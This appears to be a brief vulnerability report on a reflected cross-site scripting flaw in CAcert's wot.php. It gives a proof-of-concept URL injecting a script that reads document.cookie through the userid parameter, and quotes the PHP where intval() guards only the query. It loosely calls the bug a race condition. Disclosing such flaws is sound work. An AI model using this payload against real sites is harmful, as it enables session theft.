https://www.cacert.org/wot.php?id=9&userid=1%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
logic race condition: intval() takes only the 1, the test passes and the unckecked $_REQUEST['userid']
makes the rest (pages/wot/9.php)
$res = mysql_query("select * from `users` where `id`='".intval($_REQUEST['userid'])."' and `listme`='1'");
if(mysql_num_rows($res) <= 0)
{
echo _("Sorry, I was unable to locate that user, the person doesn't wish to be contacted, or isn't an assurer.");
} else {
....